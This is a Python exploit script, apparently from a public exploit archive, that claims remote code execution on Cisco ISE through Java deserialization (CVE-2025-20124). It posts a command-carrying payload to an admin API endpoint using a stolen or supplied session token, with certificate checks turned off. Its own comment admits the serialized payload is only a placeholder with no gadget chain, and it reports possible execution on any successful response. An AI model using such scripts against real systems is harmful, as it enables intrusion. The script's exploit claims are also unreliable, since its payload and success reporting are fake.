Cisco ISE 3.0 - Remote Code Execution (RCE)

# Exploit Title: Cisco ISE 3.0 - Remote Code Execution (RCE)
# Exploit Author: @ibrahimsql ibrahimsql.com
# Exploit Author's github: https://github.com/ibrahmsql
# Description: Cisco ISE API Java Deserialization RCE
# CVE: CVE-2025-20124
# Vendor Homepage: https://www.cisco.com/
# Requirements: requests>=2.25.0, urllib3>=1.26.0
# Usage: python3 CVE-2025-20124.py --url https://ise.target.com --session TOKEN --cmd "id"

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests
import sys
import argparse
import base64
import urllib3
urllib3.disable_warnings()

def banner():
    print(r"""
_________ .__                     
\_   ___ \|__| ______ ____  ____  
/    \  \/|  |/  ___// ___\/  _ \ 
\     \___|  |\___ \\  \__(  <_> )
 \______  /__/____  >\___  >____/ 
        \/        \/     \/     
                                          
Cisco ISE Java Deserialization RCE
CVE-2025-20124
Author: ibrahmsql | github.com/ibrahmsql
""")

def build_serialize_payload(cmd):
    """
    Java deserialization payload builder
    """
    java_cmd = cmd.replace('"', '\\"')
    # Placeholder serialization - gerçek exploit için gadget chain gerekli
    payload = f'\xac\xed\x00\x05sr\x00...ExecGadget...execute("{java_cmd}")'
    return base64.b64encode(payload.encode()).decode()

def exploit_deserialization(base_url, session_token, cmd):
    """
    CVE-2025-20124: Java Deserialization RCE
    """
    endpoint = f"{base_url}/api/v1/admin/deserializer"
    headers = {
        "Cookie": f"ISESSIONID={session_token}",
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (compatible; ISE-Exploit)"
    }
    
    payload = build_serialize_payload(cmd)
    data = {"object": payload}
    
    print(f"[+] Target: {base_url}")
    print(f"[+] Endpoint: {endpoint}")
    print(f"[+] Command: {cmd}")
    print(f"[+] Sending deserialization payload...")
    
    try:
        r = requests.post(endpoint, json=data, headers=headers, verify=False, timeout=10)
        
        if r.status_code == 200:
            print("[+] Payload successfully sent!")
            print("[+] Command possibly executed!")
            if r.text:
                print(f"[+] Response: {r.text[:500]}")
        elif r.status_code == 401:
            print("[-] Authentication failed - invalid session token")
        elif r.status_code == 403:
            print("[-] Access denied - insufficient privileges")
        elif r.status_code == 404:
            print("[-] Endpoint not found - target may not be vulnerable")
        else:
            print(f"[-] Unexpected response: {r.status_code}")
            print(f"[-] Response: {r.text[:200]}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

def main():
    parser = argparse.ArgumentParser(
        description="CVE-2025-20124 - Cisco ISE Java Deserialization RCE",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python3 CVE-2025-20124.py --url https://ise.company.com --session ABCD1234 --cmd "id"
  python3 CVE-2025-20124.py --url https://10.0.0.1:9060 --session TOKEN123 --cmd "whoami"
        """
    )
    
    parser.add_argument("--url", required=True, help="Base URL of Cisco ISE appliance")
    parser.add_argument("--session", required=True, help="Authenticated ISE session token")
    parser.add_argument("--cmd", required=True, help="Command to execute via deserialization")
    
    args = parser.parse_args()
    
    banner()
    
    # URL validation
    if not args.url.startswith(('http://', 'https://')):
        print("[-] URL must start with http:// or https://")
        sys.exit(1)
    
    exploit_deserialization(args.url, args.session, args.cmd)

if __name__ == "__main__":
    main()